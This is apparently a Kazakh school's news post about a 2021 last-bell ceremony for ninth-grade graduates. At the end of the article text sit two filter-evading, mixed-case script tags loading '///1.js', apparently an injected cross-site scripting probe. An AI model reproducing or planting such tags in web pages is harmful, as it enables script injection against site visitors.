25 мамырда ашық ауада және әлеуметтік қашықтықтың барлық шараларын сақтай отырып , салтанатты рәсім өтті. Қазақстан Республикасының Мемлекеттік Гимнін орындағаннан кейін 9 сынып түлектері мектеп қабырғасында 9 жыл білім алғандары туралы өлең айтып, мұғалімдерге, сынып жетекшілеріне, ата-аналарға алғыстарын білдірді. Салтанатты жиында оқу үздіктеріне үздік оқығандары үшін, грамоталар табыс етілді. Мектептің жеті түлегіне арнап , соңғы қоңырау соғылды. Соңғы қоңырауды 2020-2021 оқу жылында беру құқығы Гаврилов Степан мен Бегимова Алияға берілді. Баршаңызды оқу жылының аяқталуымен құттықтаймыз және жазғы демалысты жақсы өткізуге, оқушылар мен мұғалімдерге жаңа күш - қуат жинауға тілектеспіз!<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

28.05.2021
Просмотров: 2282


Пікір қосу



Деректерді қолтаңбаға қосу